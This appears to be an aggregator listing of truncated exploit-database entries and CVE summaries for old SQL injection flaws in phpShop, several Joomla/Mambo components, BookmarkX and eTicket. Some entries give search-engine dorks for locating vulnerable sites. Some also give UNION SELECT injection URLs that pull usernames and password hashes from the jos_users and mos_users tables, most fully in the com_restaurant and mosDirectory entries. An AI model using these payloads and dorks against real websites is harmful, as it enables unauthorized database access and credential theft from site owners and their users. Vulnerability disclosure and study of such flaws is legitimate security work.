phpShop <= v 0.8.1 Remote SQL injection / Filter Bypass

Vendor : PHPShop Webiste : http://www.phpshop.org Version : v0.8.1 Author: the redc0ders / theredc0dersatgmaildotcom Condition: magicquotegpc = off , in php.ini setting Details : ========== Vulnerable Code in index.php near lines 98 - 128 code // basic SQL inject detection $myinsecurearray =...

Joomla! Component mosDirectory 2.3.2 - 'catid' SQL Injection

Joomla Component mosDirectory 2.3.2 catid Remote SQL Injection Vulnerability Script : : Dork : inurl:index.php?option=comdirectory Injection Adress : /index.php?option=comdirectory&page=viewcat&catid=SQL Code SQL Code : -1//union//select//0,concatusername,0x3a,password//from//josusers/ aNa TrYaGi...

Joomla! Component com_Marketplace 1.1.1 - SQL Injection

Joomla Component Markplace 1.1.1 Remote Sql Injection Exploit AUTHOR:SoSo H H Iraqi-Cracker Tested on: Markplace Version 1.1.1 and 1.1.1-pl1 Dork:"Marketplace Version 1.1.1" "Marketplace Version 1.1.1-pl1" inurl:index.php?option=commarketplace Exploit in:...

BookmarkX script 2007 - topicid SQL Injection

BookmarkX script 2007 - topicid SQL Injection BookmarkX scriptPowered by GengoliaWebStudioSQL Injection AUTHOR : S@BUN HOME : http://www.hackturkiye.com/ DorKs 1 : "2007 BookmarkX script" DORKS 2 : Powered by GengoliaWebStudio DORK 3 : allinurl :"index.php?menu=showtopic" EXPLOIT :...

BookmarkX script 2007 - 'topicid' SQL Injection

BookmarkX scriptPowered by GengoliaWebStudioSQL Injection AUTHOR : S@BUN HOME : http://www.hackturkiye.com/ DorKs 1 : "2007 BookmarkX script" DORKS 2 : Powered by GengoliaWebStudio DORK 3 : allinurl :"index.php?menu=showtopic" EXPLOIT :...

phpShop 0.8.1 - SQL Injection / Filter Bypass

Vendor : PHPShop Webiste : http://www.phpshop.org Version : v0.8.1 Author: the redc0ders / theredc0dersatgmaildotcom Condition: magicquotegpc = off , in php.ini setting Details : ========== Vulnerable Code in index.php near lines 98 - 128 code // basic SQL inject detection $myinsecurearray =...

CVE-2008-0552

Cross-site scripting XSS vulnerability in index.php in eTicket 1.5.6-RC4 allows remote attackers to inject arbitrary web script or HTML via the PATHINFO...

joomlaako-sql.txt

joomla SQL Injectioncomakogallery AUTHOR : S@BUN HOME : http://www.hackturkiye.com/ DorKs 1 : allinurl: "comakogallery" EXPLOIT :...

joomlarest-sql.txt

joomla SQL Injectioncomrestaurant AUTHOR : S@BUN HOME : http://www.hackturkiye.com/ DorKs 1 : allinurl: "comrestaurant" EXPLOIT : index.php?option=comrestaurant&Itemid=S@BUN&func=detail&id=-1//union//select//0,0,password,0,0,0,0,0,0,0,0,0,username//from//mosusers/ S@BUN www.hackturkiye.com S@BUN...

Sql injection

SQL injection vulnerability in index.php in the Recipes comrecipes 1.00 component for Mambo and Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter in a detail action...

Sql injection

SQL injection vulnerability in index.php in the fq comfq component for Mambo and Joomla! allows remote attackers to execute arbitrary SQL commands via the listid parameter...

CVE-2008-0515

SQL injection vulnerability in index.php in the musepoes commusepoes component for Mambo and Joomla! allows remote attackers to execute arbitrary SQL commands via the aid parameter in an answer action...

CVE-2008-0512

CVE-2008-0512 describes an SQL injection in the fq (com_fq) component for Mambo and Joomla!, in index.php via the listid parameter. The underlying issue is a vulnerability in the way listid is handled, allowing remote attackers to execute arbitrary SQL commands. This aligns with the NVD entry and...

CVE-2008-0515

The CVE-2008-0515 issue affects Mambo/Joomla! environments using the musepoes component (com_musepoes). The vulnerability is a SQL injection in index.php, exploitable via the aid parameter in an answer action, allowing remote attackers to execute arbitrary SQL commands. The cited CVSSv2 base scor...

CVE-2008-0519

The CVE-2008-0519 entry describes a SQL injection vulnerability in index.php of the Atapin Jokes (com_jokes) 1.0 component used with Mambo and Joomla!. The issue is triggered via the cat parameter in a CatView action, allowing remote attackers to execute arbitrary SQL commands. Documents confirm ...

CVE-2008-0518

The CVE-2008-0518 issue affects the Mambo/Joomla! Recipes component (com_recipes) version 1.00, where an SQL injection vulnerability exists in index.php via the id parameter in a detail action. The root cause is improper handling of the id input, allowing remote attackers to manipulate SQL comman...

CVE-2008-0518

SQL injection vulnerability in index.php in the Recipes comrecipes 1.00 component for Mambo and Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter in a detail action...

CVE-2008-0514

CVE-2008-0514 affects the Glossary (com_glossary) 2.0 component used by Mambo/Joomla!, where index.php is vulnerable to SQL injection through the catid parameter in a display action. The issue enables remote attackers to execute arbitrary SQL commands and potentially access or modify data. The vu...

Mambo Component Catalogshop 1.0b1 SQL Injection Vulnerability

Exploit for unknown platform in category web applications ============================================================= Mambo Component Catalogshop 1.0b1 SQL Injection Vulnerability ============================================================= joomla SQL Injectioncomcatalogshop DorKs 1 : allinurl...

joomlarecipes-sql.txt

joomla SQL Injectioncomrecipes AUTHOR : S@BUN HOME : http://www.hackturkiye.com/ DorKs 1 : allinurl: "comrecipes" EXPLOIT :...